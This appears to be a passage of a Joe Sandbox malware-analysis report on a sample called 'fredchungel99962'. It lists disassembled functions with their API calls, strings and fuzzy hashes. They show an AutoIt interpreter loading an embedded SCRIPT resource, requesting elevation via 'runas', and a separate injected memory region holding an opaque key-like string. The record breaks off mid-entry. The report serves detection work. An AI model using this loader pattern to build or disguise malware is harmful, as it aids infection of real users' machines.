Function 012B42A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 012B42B2
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,012B50AA,?,?,00000000,00000000), ref: 012B42C9
LoadResource.KERNEL32(?,00000000,?,?,012B50AA,?,?,00000000,00000000,?,?,?,?,?,?,012B4F20), ref: 012F35BE
SizeofResource.KERNEL32(?,00000000,?,?,012B50AA,?,?,00000000,00000000,?,?,?,?,?,?,012B4F20), ref: 012F35D3
LockResource.KERNEL32(012B50AA,?,?,012B50AA,?,?,00000000,00000000,?,?,?,?,?,?,012B4F20,?), ref: 012F35E6

Strings

SCRIPT, xrefs: 012B42BF

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 56c28c71381762c34c7df7e10b4aa3cb1a6a24749348e4e4fca9004ab8f1e791
Instruction ID: 47a67cb9230f401257fb03a01fe6e12cc947fafd6c99a2df913dfa6490aa357b
Opcode Fuzzy Hash: 56c28c71381762c34c7df7e10b4aa3cb1a6a24749348e4e4fca9004ab8f1e791
Instruction Fuzzy Hash: EC115A74201601AFEB219BA9DC89F677BBDEBC5B91F10416AB60696250DBB1E800D620

Uniqueness

Uniqueness Score: -1.00%

Function 012F2BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetCurrentDirectoryW.KERNEL32(?), ref: 012B2B6B

Part of subcall function 012B3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,01381418,?,012B2E7F,?,?,?,00000000), ref: 012B3A78

Part of subcall function 012B9CB3: _wcslen.LIBCMT ref: 012B9CBD

GetForegroundWindow.USER32 ref: 012F2C10
ShellExecuteW.SHELL32(00000000,?,?,01372224), ref: 012F2C17

Strings

runas, xrefs: 012F2C0B

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
String ID: runas
API String ID: 448630720-4000483414
Opcode ID: e1803b2c3840dc6d887fd652b30fd9616eadc794377fb359d02f8cda7822820a
Instruction ID: bde4726249c968a6b8e8747e7634eb8228fa7d645f852eb0cf26fa0397d4fec3
Opcode Fuzzy Hash: e1803b2c3840dc6d887fd652b30fd9616eadc794377fb359d02f8cda7822820a
Instruction Fuzzy Hash: 2511B431228347AEC715FF64D8D0AFEBBA8ABA5784F44142DF28253152DF20A58A8752

Uniqueness

Uniqueness Score: -1.00%

Function 0131DBBE Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,012F5222), ref: 0131DBCE
GetFileAttributesW.KERNELBASE(?), ref: 0131DBDD
FindFirstFileW.KERNELBASE(?,?), ref: 0131DBEE
FindClose.KERNEL32(00000000), ref: 0131DBFA

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: FileFind$AttributesCloseFirstlstrlen
String ID:
API String ID: 2695905019-0
Opcode ID: 7162f291cc960e6a277fbbebcb34f4916b132be8f4b6db6f40d9c048d6d33255
Instruction ID: a4db2150b8428c46e836fa04ccb9b7ec53b0c6ca5722c84ec5be33a6f57decc5
Opcode Fuzzy Hash: 7162f291cc960e6a277fbbebcb34f4916b132be8f4b6db6f40d9c048d6d33255
Instruction Fuzzy Hash: 05F0E53881191457DB346BBCBC0D8AA3B6C9E02338F104B02FA3AC20E8EFF0695487D5

Uniqueness

Uniqueness Score: -1.00%

Function 012E333F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000,012DE505), ref: 012E337E

Strings

GetSystemTimePreciseAsFileTime, xrefs: 012E3350, 012E335A

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Time$FileSystem
String ID: GetSystemTimePreciseAsFileTime
API String ID: 2086374402-595813830
Opcode ID: 2e4a2ad2315c1f658ae17c5040141560c2a1326585b5bf38d7e70fa11e25650d
Instruction ID: bba924b1a5d7f90d355b6abfa1c72f8146dc5aa57230a757709b364284d20f9b
Opcode Fuzzy Hash: 2e4a2ad2315c1f658ae17c5040141560c2a1326585b5bf38d7e70fa11e25650d
Instruction Fuzzy Hash: 5AE05531A11208EBD320ABA58C06E3FBF98DB51F50F82011DFD094B700CD300D018BCA

Uniqueness

Uniqueness Score: -1.00%

Function 012D09D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 012D09DA

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: e9785d5d8a835c186661c6371eb10229ba52cb75bac9d02eb4962aea89279535
Instruction ID: 2278d9481e7454022f53b7813c20639ad9135cd98ea794475a463366af102d9b
Opcode Fuzzy Hash: e9785d5d8a835c186661c6371eb10229ba52cb75bac9d02eb4962aea89279535
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 012BD730 Relevance: 21.6, APIs: 14, Instructions: 631windowsleeptimeCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 012BD807
timeGetTime.WINMM ref: 012BDA07
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 012BDB28
TranslateMessage.USER32(?), ref: 012BDB7B
DispatchMessageW.USER32(?), ref: 012BDB89
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 012BDB9F
Sleep.KERNEL32(0000000A), ref: 012BDBB1

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
String ID:
API String ID: 2189390790-0
Opcode ID: 8a8c49b2cd836faad85fa116a58a575878513d92f49d1ae53a2f9a266a38deb3
Instruction ID: 705e2e5ac572ff20ccdf5f134b949736eb12302e4001e2508a1377783bcf09a2
Opcode Fuzzy Hash: 8a8c49b2cd836faad85fa116a58a575878513d92f49d1ae53a2f9a266a38deb3
Instruction Fuzzy Hash: 46421430614746DFE73ACF28C498BEABBE5BF45348F04465DE65987291DB70E884CB82

Uniqueness

Uniqueness Score: -1.00%

Function 012B344D Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 012B3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,01381418,?,012B2E7F,?,?,?,00000000), ref: 012B3A78

Part of subcall function 012B3357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 012B3379

RegOpenKeyExW.KERNEL32 ref: 012B356A
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 012F318D
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?), ref: 012F31CE
RegCloseKey.ADVAPI32(?), ref: 012F3210
_wcslen.LIBCMT ref: 012F3277
_wcslen.LIBCMT ref: 012F3286

Strings

Pmr, xrefs: 012B349D
Software\AutoIt v3\AutoIt, xrefs: 012B3560
\Include\, xrefs: 012B3527
Include, xrefs: 012F3184, 012F31C5
\, xrefs: 012F328C

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
String ID: Include$Pmr$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 98802146-598850514
Opcode ID: 5d4b8ee10dc88df2ef8211a16e332d8e6d3f64fd50ff4427cc74519aca6e47a4
Instruction ID: 75d722259f568cf1ff2636e9edb2c826eba88f57e045a44809c09a2d34b76bdd
Opcode Fuzzy Hash: 5d4b8ee10dc88df2ef8211a16e332d8e6d3f64fd50ff4427cc74519aca6e47a4
Instruction Fuzzy Hash: 0B71C3715243029FC724EF69E8908AFBBECFF95784F40042EF64593164EBB09948CB51

Uniqueness

Uniqueness Score: -1.00%

Function 012F065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 012F039A: CreateFileW.KERNELBASE(00000000,00000000,?,012F0704,?,?,00000000), ref: 012F03B7

GetLastError.KERNEL32 ref: 012F076F
__dosmaperr.LIBCMT ref: 012F0776
GetFileType.KERNELBASE ref: 012F0782
GetLastError.KERNEL32 ref: 012F078C
__dosmaperr.LIBCMT ref: 012F0795
CloseHandle.KERNEL32(00000000), ref: 012F07B5
CloseHandle.KERNEL32(?), ref: 012F08FF
GetLastError.KERNEL32 ref: 012F0931
__dosmaperr.LIBCMT ref: 012F0938

Strings

H, xrefs: 012F08BD

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: ef4a9037b36c86cced50e80eb725c0b4f2840eca9bb4c967d604ad5fc60640ce
Instruction ID: b67152daa91553a2e5496d109face031419043cb80e59f4f2d806087fec1d7eb
Opcode Fuzzy Hash: ef4a9037b36c86cced50e80eb725c0b4f2840eca9bb4c967d604ad5fc60640ce
Instruction Fuzzy Hash: A2A14832A201098FDF19AF68D855BBEBBA1EF06320F14016DF9119F3D2D7309906CB95

Uniqueness

Uniqueness Score: -1.00%

Function 012B2B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32 ref: 012B2B8E
LoadCursorW.USER32 ref: 012B2B9D
LoadIconW.USER32 ref: 012B2BB3
LoadIconW.USER32 ref: 012B2BC5
LoadIconW.USER32 ref: 012B2BD7
LoadImageW.USER32 ref: 012B2BEF
RegisterClassExW.USER32(?), ref: 012B2C40

Part of subcall function 012B2CD4: GetSysColorBrush.USER32 ref: 012B2D07
Part of subcall function 012B2CD4: RegisterClassExW.USER32(00000030), ref: 012B2D31
Part of subcall function 012B2CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 012B2D42
Part of subcall function 012B2CD4: InitCommonControlsEx.COMCTL32(?), ref: 012B2D5F
Part of subcall function 012B2CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 012B2D6F
Part of subcall function 012B2CD4: LoadIconW.USER32 ref: 012B2D85
Part of subcall function 012B2CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 012B2D94

Strings

0, xrefs: 012B2C0F
AutoIt v3, xrefs: 012B2C2F
#, xrefs: 012B2C16

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 230b223e5a8500e4f58c81dc3e4a7e8d5d14adc1e6ca58d1c790c5a1a4b21d26
Instruction ID: f7fbd26f5a1db5a8521e923ca164ea9f3342e1daa223975e6bc6e7f550ef4e57
Opcode Fuzzy Hash: 230b223e5a8500e4f58c81dc3e4a7e8d5d14adc1e6ca58d1c790c5a1a4b21d26
Instruction Fuzzy Hash: 8E212975E11318AFDB31DFA6E895AED7FB8FB48B50F00001AE500A6698D7F11541CF90

Uniqueness

Uniqueness Score: -1.00%

Function 012B3170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,012B316A,?,?), ref: 012B31D8
KillTimer.USER32 ref: 012B3204
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 012B3227
RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,012B316A,?,?), ref: 012B3232
CreatePopupMenu.USER32 ref: 012B3246
PostQuitMessage.USER32 ref: 012B3267

Strings

TaskbarCreated, xrefs: 012B322D

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: 67e33f26efcfbf2c1e65237469468e3360b7ef7a6a0805d6d704fbf63d624de1
Instruction ID: ce42491b741f41485e2921c102a8902873c50b95c3278fbd637d44684b5d4adc
Opcode Fuzzy Hash: 67e33f26efcfbf2c1e65237469468e3360b7ef7a6a0805d6d704fbf63d624de1
Instruction Fuzzy Hash: DE41B439270306AFEB25EB7CD98ABFD3E6DF705384F040129F70296285CAB19841C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 012E8D45 Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 863e208175add59296b3a1c4aebb0e874db6deee40f96ccf2714b6e1140a921f
Instruction ID: 792d7ce6aba5d7670514da531e839649e53b1d7e718f80ad5ea15c325e1cfa4e
Opcode Fuzzy Hash: 863e208175add59296b3a1c4aebb0e874db6deee40f96ccf2714b6e1140a921f
Instruction Fuzzy Hash: 84C1047492424A9FDF11DFACC848BBDBFF4AF19314F88418AE655A7382C7709981CB60

Uniqueness

Uniqueness Score: -1.00%

Function 001D2690 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 001D2761
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 001D2987

Memory Dump Source

Source File: 00000005.00000002.347993788.00000000001D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d0000_fredchungel99962.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: d148fe5d8863b416e5057870d6e1995944efe260b2a1982c94e468d18abf04d1
Instruction ID: 96f52057584a67a074e7026254855e24daeb79104fe08e0478718f0d6077db3e
Opcode Fuzzy Hash: d148fe5d8863b416e5057870d6e1995944efe260b2a1982c94e468d18abf04d1
Instruction Fuzzy Hash: 74A10870E00219EBDB18CFA4C894BEEB7B5BF58704F20815AE515BB380D7759A41DF54

Uniqueness

Uniqueness Score: -1.00%

Function 012B2C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32 ref: 012B2C91
CreateWindowExW.USER32 ref: 012B2CB2
ShowWindow.USER32(00000000), ref: 012B2CC6
ShowWindow.USER32(00000000), ref: 012B2CCF

Strings

AutoIt v3, xrefs: 012B2C89, 012B2C8E, 012B2C8F
edit, xrefs: 012B2CAC

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 26f1635388630f147e44ee7e025a2f3eee3d04ca7e5565055401580b88807f46
Instruction ID: 565ce4ee92afa773b8a60325617fb6266ad3457f4a54573124120dd2ba7153e7
Opcode Fuzzy Hash: 26f1635388630f147e44ee7e025a2f3eee3d04ca7e5565055401580b88807f46
Instruction Fuzzy Hash: FDF0B7795413907FEB315717AC08EBB2EBDD7C6F50F00105AF900A2558C6A51852DBB0

Uniqueness

Uniqueness Score: -1.00%

Function 012E61FE Relevance: 9.2, APIs: 6, Instructions: 216
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,012D82D9,012D82D9,?,?,?,012E644F,00000001,00000001,8BE85006), ref: 012E6258
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,012E644F,00000001,00000001,8BE85006,?,?,?), ref: 012E62DE
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 012E63D8
__freea.LIBCMT ref: 012E63E5

Part of subcall function 012E3820: RtlAllocateHeap.NTDLL(00000000,?,01381444,?,012CFDF5,?,?,012BA976,00000010,01381440,012B13FC,?,012B13C6,?,012B1129), ref: 012E3852

__freea.LIBCMT ref: 012E63EE
__freea.LIBCMT ref: 012E6413

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 0827ede7c0fed4095b6130268c01fddbee4bc8900f18ff3ff3596d777ba6dd3e
Instruction ID: ec9f5d143cfdd5d50e2b634d6d719e5e37e3ce70ad10cf6d6069197270b3ecad
Opcode Fuzzy Hash: 0827ede7c0fed4095b6130268c01fddbee4bc8900f18ff3ff3596d777ba6dd3e
Instruction Fuzzy Hash: 4751F772620217ABEF258FA8CC89EBF7BE9EB64A10F544629FE05D7140DB34DC40C660

Uniqueness

Uniqueness Score: -1.00%

Function 001D2410 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 161
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 001D2300: Sleep.KERNELBASE(000001F4), ref: 001D2311

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 001D2578

Strings

9AYSL3ZA00Z9L6APVDARE34L93V, xrefs: 001D25DE, 001D25E1

Memory Dump Source

Source File: 00000005.00000002.347993788.00000000001D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d0000_fredchungel99962.jbxd

Similarity

API ID: CreateFileSleep
String ID: 9AYSL3ZA00Z9L6APVDARE34L93V
API String ID: 2694422964-678999660
Opcode ID: 9d58a95c0db9496fde9a9511cf46d92d3234ef88ec852ffcdfdb0f79b7c2638e
Instruction ID: 2fcda43ce84e90999a747ca1a40e39ae91cf0f3a74289c7c630142a19f96ba87
Opcode Fuzzy Hash: 9d58a95c0db9496fde9a9511cf46d92d3234ef88ec852ffcdfdb0f79b7c2638e
Instruction Fuzzy Hash: 3861B630D04288DAEF11DBE4D814BEFBB74AF29300F044199E6587B2C1D7B90B45CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 012B10F3 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 153
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 012B1BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 012B1BF4
Part of subcall function 012B1BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 012B1BFC
Part of subcall function 012B1BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 012B1C07
Part of subcall function 012B1BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 012B1C12
Part of subcall function 012B1BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 012B1C1A
Part of subcall function 012B1BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 012B1C22

Part of subcall function 012B1B4A: RegisterWindowMessageW.USER32(00000004,?,012B12C4), ref: 012B1BA2

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 012B136A
OleInitialize.OLE32 ref: 012B1388
CloseHandle.KERNEL32(00000000), ref: 012F24AB

Strings

xQr, xrefs: 012B1292
0`r, xrefs: 012B12C4

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID: 0`r$xQr
API String ID: 1986988660-3606100829
Opcode ID: a4e0a674aa071aea685500b297467e6db3d84bd0f95d442642e0158de8e9a1f2
Instruction ID: 19754a173d0bc0b4f4a3e2ba03938d1a16cfce5f4f9b9132c3cfbb4bb473c554
